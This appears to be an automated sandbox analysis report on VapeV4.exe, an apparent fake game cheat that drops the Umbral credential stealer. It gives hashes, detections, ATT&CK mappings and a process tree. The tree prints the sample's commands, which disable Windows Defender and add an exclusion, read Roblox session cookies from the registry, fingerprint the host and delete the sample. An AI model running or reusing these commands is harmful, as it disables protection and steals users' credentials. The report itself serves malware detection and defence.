Analysis
-
max time kernel
92s -
max time network
94s -
platform
windows11-21h2_x64 -
resource
win11-20240730-en -
resource tags
arch:x64arch:x86image:win11-20240730-enlocale:en-usos:windows11-21h2-x64system -
submitted
31-07-2024 13:16
General
-
Target
VapeV4.exe
-
Size
12.0MB
-
MD5
5f3fabec375e5a1acc1431477309ab48
-
SHA1
c12fc1f9da09dd799601cc8c852cd742e6d2b32e
-
SHA256
14a16b4fcb0af8c5fae891e060a5175f58c020a735be9e5a2242ac76c4327946
-
SHA512
9b9567c649e98964949dc00a6865d0656c2fa600f294a654ef4264b48a6b34f0d3096c20603acafbb47c4e1568893078dc53c5a619a9b839fee434853bfb9d72
-
SSDEEP
98304:DemvHzXnfpOfKEmZH0H7UpjSSJgEEjZoTsBbZAqSsraMh+QIUuoMOWucEZ8:DNHrxygH87BdjZ/JPraxzNo
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x000500000002a9f0-11.dat family_umbral behavioral1/memory/1668-18-0x0000022D2A550000-0x0000022D2A590000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
pid Process 2816 powershell.exe 556 powershell.exe 4612 powershell.exe 3576 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts VAPECRACKED.EXE -
Executes dropped EXE 2 IoCs
pid Process 1136 PTV0FS56EO2.EXE 1668 VAPECRACKED.EXE -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 discord.com 6 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VapeV4.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3692 cmd.exe 2532 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4768 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2532 PING.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1668 VAPECRACKED.EXE 3576 powershell.exe 3576 powershell.exe 4612 powershell.exe 4612 powershell.exe 2816 powershell.exe 2816 powershell.exe 1416 powershell.exe 1416 powershell.exe 556 powershell.exe 556 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1668 VAPECRACKED.EXE Token: SeDebugPrivilege 1136 PTV0FS56EO2.EXE Token: SeIncreaseQuotaPrivilege 4564 wmic.exe Token: SeSecurityPrivilege 4564 wmic.exe Token: SeTakeOwnershipPrivilege 4564 wmic.exe Token: SeLoadDriverPrivilege 4564 wmic.exe Token: SeSystemProfilePrivilege 4564 wmic.exe Token: SeSystemtimePrivilege 4564 wmic.exe Token: SeProfSingleProcessPrivilege 4564 wmic.exe Token: SeIncBasePriorityPrivilege 4564 wmic.exe Token: SeCreatePagefilePrivilege 4564 wmic.exe Token: SeBackupPrivilege 4564 wmic.exe Token: SeRestorePrivilege 4564 wmic.exe Token: SeShutdownPrivilege 4564 wmic.exe Token: SeDebugPrivilege 4564 wmic.exe Token: SeSystemEnvironmentPrivilege 4564 wmic.exe Token: SeRemoteShutdownPrivilege 4564 wmic.exe Token: SeUndockPrivilege 4564 wmic.exe Token: SeManageVolumePrivilege 4564 wmic.exe Token: 33 4564 wmic.exe Token: 34 4564 wmic.exe Token: 35 4564 wmic.exe Token: 36 4564 wmic.exe Token: SeIncreaseQuotaPrivilege 4564 wmic.exe Token: SeSecurityPrivilege 4564 wmic.exe Token: SeTakeOwnershipPrivilege 4564 wmic.exe Token: SeLoadDriverPrivilege 4564 wmic.exe Token: SeSystemProfilePrivilege 4564 wmic.exe Token: SeSystemtimePrivilege 4564 wmic.exe Token: SeProfSingleProcessPrivilege 4564 wmic.exe Token: SeIncBasePriorityPrivilege 4564 wmic.exe Token: SeCreatePagefilePrivilege 4564 wmic.exe Token: SeBackupPrivilege 4564 wmic.exe Token: SeRestorePrivilege 4564 wmic.exe Token: SeShutdownPrivilege 4564 wmic.exe Token: SeDebugPrivilege 4564 wmic.exe Token: SeSystemEnvironmentPrivilege 4564 wmic.exe Token: SeRemoteShutdownPrivilege 4564 wmic.exe Token: SeUndockPrivilege 4564 wmic.exe Token: SeManageVolumePrivilege 4564 wmic.exe Token: 33 4564 wmic.exe Token: 34 4564 wmic.exe Token: 35 4564 wmic.exe Token: 36 4564 wmic.exe Token: SeDebugPrivilege 3576 powershell.exe Token: SeDebugPrivilege 4612 powershell.exe Token: SeDebugPrivilege 2816 powershell.exe Token: SeDebugPrivilege 1416 powershell.exe Token: SeIncreaseQuotaPrivilege 2952 wmic.exe Token: SeSecurityPrivilege 2952 wmic.exe Token: SeTakeOwnershipPrivilege 2952 wmic.exe Token: SeLoadDriverPrivilege 2952 wmic.exe Token: SeSystemProfilePrivilege 2952 wmic.exe Token: SeSystemtimePrivilege 2952 wmic.exe Token: SeProfSingleProcessPrivilege 2952 wmic.exe Token: SeIncBasePriorityPrivilege 2952 wmic.exe Token: SeCreatePagefilePrivilege 2952 wmic.exe Token: SeBackupPrivilege 2952 wmic.exe Token: SeRestorePrivilege 2952 wmic.exe Token: SeShutdownPrivilege 2952 wmic.exe Token: SeDebugPrivilege 2952 wmic.exe Token: SeSystemEnvironmentPrivilege 2952 wmic.exe Token: SeRemoteShutdownPrivilege 2952 wmic.exe Token: SeUndockPrivilege 2952 wmic.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 2100 wrote to memory of 1136 2100 VapeV4.exe 79 PID 2100 wrote to memory of 1136 2100 VapeV4.exe 79 PID 2100 wrote to memory of 1668 2100 VapeV4.exe 81 PID 2100 wrote to memory of 1668 2100 VapeV4.exe 81 PID 1668 wrote to memory of 4564 1668 VAPECRACKED.EXE 82 PID 1668 wrote to memory of 4564 1668 VAPECRACKED.EXE 82 PID 1668 wrote to memory of 5012 1668 VAPECRACKED.EXE 85 PID 1668 wrote to memory of 5012 1668 VAPECRACKED.EXE 85 PID 1668 wrote to memory of 3576 1668 VAPECRACKED.EXE 87 PID 1668 wrote to memory of 3576 1668 VAPECRACKED.EXE 87 PID 1668 wrote to memory of 4612 1668 VAPECRACKED.EXE 89 PID 1668 wrote to memory of 4612 1668 VAPECRACKED.EXE 89 PID 1668 wrote to memory of 2816 1668 VAPECRACKED.EXE 91 PID 1668 wrote to memory of 2816 1668 VAPECRACKED.EXE 91 PID 1668 wrote to memory of 1416 1668 VAPECRACKED.EXE 93 PID 1668 wrote to memory of 1416 1668 VAPECRACKED.EXE 93 PID 1668 wrote to memory of 2952 1668 VAPECRACKED.EXE 95 PID 1668 wrote to memory of 2952 1668 VAPECRACKED.EXE 95 PID 1668 wrote to memory of 2760 1668 VAPECRACKED.EXE 97 PID 1668 wrote to memory of 2760 1668 VAPECRACKED.EXE 97 PID 1668 wrote to memory of 2668 1668 VAPECRACKED.EXE 99 PID 1668 wrote to memory of 2668 1668 VAPECRACKED.EXE 99 PID 1668 wrote to memory of 556 1668 VAPECRACKED.EXE 101 PID 1668 wrote to memory of 556 1668 VAPECRACKED.EXE 101 PID 1668 wrote to memory of 4768 1668 VAPECRACKED.EXE 103 PID 1668 wrote to memory of 4768 1668 VAPECRACKED.EXE 103 PID 1668 wrote to memory of 3692 1668 VAPECRACKED.EXE 105 PID 1668 wrote to memory of 3692 1668 VAPECRACKED.EXE 105 PID 3692 wrote to memory of 2532 3692 cmd.exe 107 PID 3692 wrote to memory of 2532 3692 cmd.exe 107 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5012 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\VapeV4.exe"C:\Users\Admin\AppData\Local\Temp\VapeV4.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Users\Admin\AppData\Local\Temp\PTV0FS56EO2.EXE"C:\Users\Admin\AppData\Local\Temp\PTV0FS56EO2.EXE"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1136
-
-
C:\Users\Admin\AppData\Local\Temp\VAPECRACKED.EXE"C:\Users\Admin\AppData\Local\Temp\VAPECRACKED.EXE"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4564
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\VAPECRACKED.EXE"3⤵
- Views/modifies file attributes
PID:5012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\VAPECRACKED.EXE'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1416
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:2760
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:2668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:556
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:4768
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\VAPECRACKED.EXE" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2532
-
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
944B
MD51a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA19910190edfaccece1dfcc1d92e357772f5dae8f7
SHA2560ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA5125d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64
-
Filesize
948B
MD502975ea0938bd97fc7230f785cd825a7
SHA1192713c1f2912016fb8c2f1ed8eb8be4a883218d
SHA256c330ecfbea7de88e537747edbb97192cbca39b8ec65e9dc6105d2a7a3e3d6859
SHA51252e28301d3981c4eb78988018a7c56788e1ebbea586612f68016cad8317223a74851bb6a3f91f62d1e8c914c075c775810c90f5994ecadd73c635194aaaf5bf9
-
Filesize
1KB
MD57332074ae2b01262736b6fbd9e100dac
SHA122f992165065107cc9417fa4117240d84414a13c
SHA256baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa
SHA5124ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2
-
Filesize
1KB
MD5294c4ec36f96662c1c9dd39aa68a494c
SHA10ec6b16f8b5f316ed159e7870713f6d6e6de7cd0
SHA256411e5e58fa224daf1f1b7459726b1d32b8de22712bcc19f43c0bb7c1d2208b27
SHA51210ab73950480692a5ed13634309f6d23eab65b93dfab46d479ce1c5199112f38f05338b997e95dc4dcf7998d00b36d9a8f12021ea072d7b818248b7e5f74508c
-
Filesize
11.7MB
MD52e56df9a8706992ee6ea0f376f9af25a
SHA15cab7bda6971e9348495763455067d2bb8a336e9
SHA2560303959c78d21b55fc3421ef30a80da761a5a5e2a6f8f844fdadfbd41e7f1c50
SHA512b1c486ea9e50dfb570e0a3d0532cdc685e7d23fb4852023bc8ef8587c45752bd4c0a05cea00b65286027855bfca412ccc303523906f1a43f81d246ac2b8b2bf7
-
Filesize
227KB
MD5e572c3eebbf522dc416c145df031dfaa
SHA1b057756cb76c87090cec0a171bb8c45f867675bc
SHA256da84aa6df18872e32ee26478b43130929e95640ea0862f05c96ec44c165c8472
SHA512421125d31685855a726f4d6e60a8a76aec03fa298ab0d5e790edf15a5fc6b9eb5f03584313fb0f737a800216d677ab100e0a3804c835b9a26657b2b3d086aba4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82